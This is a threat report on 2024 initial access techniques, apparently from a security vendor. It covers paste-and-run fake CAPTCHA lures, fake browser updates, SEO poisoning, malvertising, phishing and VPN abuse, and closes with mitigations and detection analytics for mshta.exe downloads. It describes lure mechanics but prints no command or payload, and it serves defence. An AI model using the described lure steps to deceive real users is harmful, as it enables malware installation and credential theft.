Initial access tradecraft

In 2024, adversaries used a wide range of methods to access and mislead unsuspecting victims. Users had to contend with malicious links and phishes presented in a multitude of ways, including via email, search engines, Microsoft Teams messages, and phone calls. “Paste and run,” a technique used to fool users into running malicious code, grew in popularity in the second half of the year. Adversaries used this method to obtain legitimate credentials and leveraged them to great effect, particularly for virtual private network (VPN) access.

Paste and run away

One of the most successful new initial access techniques we observed this year was paste and run, also known as “ClickFix” and “fakeCAPTCHA.” In the last half of the year, it became clear that this was an effective method of luring victims into executing malicious PowerShell code. Red Canary first observed the technique in August 2024, although other researchers reported seeing it in use as early as March 2024. Proofpoint coined the commonly used moniker ClickFix to initially describe the ClearFake cluster and TA571’s use of this technique. They subsequently expanded the term as they observed it being used by additional actors. At Red Canary we chose to refer to the technique in general as “paste and run,” since not all of the lures involve a “fix” of some kind.

Different styles of lures have been reported, including a phishing lure, where the victim has to copy-paste-run the code to “fix” their access to something, like a document or a video meeting:

Image courtesy of Proofpoint

Adversaries have also employed this technique via compromised websites with browser injects, posing either as fake CAPTCHAs to access the site or as a page loading error requiring a “fix” to display the page:

Image courtesy of https://bbs.kanxue.com/

To give an example using the fake CAPTCHA style lure—which has been the lure we have most frequently observed—users are presented with the typical “Verify you are human” prompt with an “I’m not a robot” button. Clicking the button covertly copies an obfuscated PowerShell command to the clipboard and presents the user with “verification steps,” instructing them to:

• Press Windows button + R (the keyboard shortcut for the Windows Run dialog)
• Press CTRL + V (to paste the previously copied PowerShell command, which the user likely does not realize was copied)
• Press Enter (execute the command)

An encoded PowerShell command then leverages Microsoft HTML Application Host (mshta.exe) to download and execute a malicious payload from a remote resource. Red Canary has observed multiple different payloads delivered via this technique, with LummaC2 being the most common payload. We’ve also seen HijackLoader, NetSupport Manager, Stealc, and CryptBot. Publicly reported payloads include DarkGate, Rhadamanthys, and Vidar, with some researchers observing a complex multi-layered execution chain delivering three or more payloads.

Web trends

Fake browser updates

Threats leveraging fake browser updates as an initial access vector, while not at all new, have increased in scope and frequency over the past couple of years and 2024 was no exception to this trend.

SocGholish and Scarlet Goldfinch detections from 2022-2024

Fake browser updates abuse users’ trust by tricking victims into downloading malicious executables posing as important browser updates. Chromium-based browsers are frequently targeted, but Firefox and other browser types are also taken advantage of.

This technique is currently employed by a number of threats, including SocGholish, Scarlet Goldfinch, FakeSG/Rogue Raticate, and ClearFake. Other threats have also used this technique (albeit less commonly), including Yellow Cockatoo and Fakebat, among others.

SEO poisoning

Search engine optimization (SEO) poisoning remains an effective technique for gaining initial access in 2024. Adversaries create malicious websites that use SEO techniques like placing strategic search keywords in the body or title of a webpage in an attempt to make their malicious sites more prominent than legitimate sites when search results are returned by Google and other search engines. The malicious sites may present whatever lure the adversary wants to use, including as a fake software installer, a document download, or one of the fake browser updates mentioned above.

Malvertising

SEO poisoning is not the only way adversaries use search engines to their advantage. Malicious advertising, also called “malvertising,” is the use of fake ads on search engine pages. These ads masquerade as legitimate websites for downloading software like Quickbooks, Grammarly, Microsoft Teams, Zoom, and more. They can also masquerade as various software updates.

Phishing trends

Phishing remains a popular method for adversaries as they attempt to gain access to victim systems. As users communicate in more ways, the types of phishing expand with them. Email phishing attacks increased in 2024, as did QR code phishing (aka “quishing”), SMS phishing, and voice phishing. Paired with social engineering, this can become a highly effective method of gaining system access. In one notable example in 2024, Black Basta affiliates paired email bombing campaigns with social engineering, posing as IT personnel “helping” with the email issue–to ultimately gain access and install RMM tools.

Vulnerability exploitation

As has been the case in previous years, adversaries exploited vulnerabilities for initial access in 2024. Two major examples we observed this year were CVE-2024-1709 & 1708—regarding ConnectWise ScreenConnect—and CVE-2023-48788, a Fortinet FortiClient vulnerability. For more information on these vulnerabilities, vulnerability exploitation, and what organizations can do to address it, check out the Vulnerabilities trend page.

VPN abuse

In late August 2024, Red Canary observed ransomware incidents that leveraged virtual private networks (VPN), both as an initial access vector and to facilitate further access within organizations. Some of the activity we saw shares significant overlaps with activity tracked by Microsoft as Storm-0844. Historically tied to Akira ransomware, Storm-0844 has recently made a switch to deploying FOG ransomware. Reporting on Akira and FOG emphasizes the consistent targeting of VPN software—notably Cisco ASA—for initial access, both in recent cases and in previous attacks from more than a year ago. Akira and FOG are not the only threats that use VPNs during their attacks. For more information, check out the VPN abuse trend page.

Paste and run

We strongly encourage increasing user education and awareness around the paste and run technique. Any pop-up window or prompt—whether it’s a CAPTCHA or a “fix” of some kind—that asks users to press the Windows button + R (the keyboard shortcut for the Windows Run dialog), followed by pressing CTRL + V (to paste the unknowingly copied PowerShell command) is almost certainly malicious.

Additional mitigation steps organizations may want to consider include disallowing access to the Run dialog or even disabling the use of cmd.exe and powershell.exe for standard users in your organization. If you choose this path, be sure to only apply the policies to users that do not require these tools for administration and troubleshooting.

Fake updates

Mitigation strategies for fake update-style lures can be challenging. We want users to keep their software and browsers updated for security purposes, so discouraging them from doing so altogether is not ideal. Most browsers automatically update or have a very specific way they will prompt the user for an update. Ensure users are aware of the legitimate update procedures for their browser of choice. Most popular browsers will not prompt with a pop-up ad that reroutes the user to an unfamiliar URL location. Also ensure users are aware of software installation and update procedures for their endpoints.

Another strategy to mitigate the effects of SEO poisoning and fake updates, which we have shared before, is to update group policy object (GPO) settings for users to make scripts open in Notepad, which stops the execution chain for script-using threats like SocGholish and Scarlet Goldfinch in their tracks.

VPN exploitation

We’ve previously shared some guidance for hardening VPN appliances, and here are some rapid response steps you can take as well:

• Even when these incidents begin on the appliances, adversaries must move further into the network to continue their operations. If your VPN controls allow for it, disable layer 2 (East-West) visibility to VPN clients, which will reduce what a threat actor can do.
• To improve your visibility, deploy endpoint detection and response (EDR) sensors across all systems capable of running them. Deploying sensors across your enterprise increases the likelihood of earlier detection. Unmonitored endpoints provide a blind spot for adversaries to operate and make detection far more difficult.

Vulnerabilities

Some of the best ways to minimize the risk of vulnerability exploitation in your environment include:

• patching regularly
• maintaining an up-to-date asset inventory to let you know if the affected product is present in your environment
• being aware of your surface area and what is exposed to the internet

Detection opportunity: mshta.exe utility making external network connections

This pseudo detection analytic identifies when mshta.exe is used to make external network connections. Adversaries–like those leveraging paste & run–can use mshta.exe to proxy the download and execution of malicious files. Sometimes mshta.exe is used in this way legitimately, so you may need to research the frequency of the command and the reputation of the domain that’s used.

Scripts executed from the  Explorer.exe  zip function

This pseudo detection analytic identifies scripts executed from the built-in Explorer.exe zip folder function. Threats like SocGholish and Scarlet Goldfinch sometimes use malicious scripts compressed via a zip file as a form of packing in order to evade network-based security. This kind of analytic may be too noisy if your environment commonly uses scripts to compress and share reports.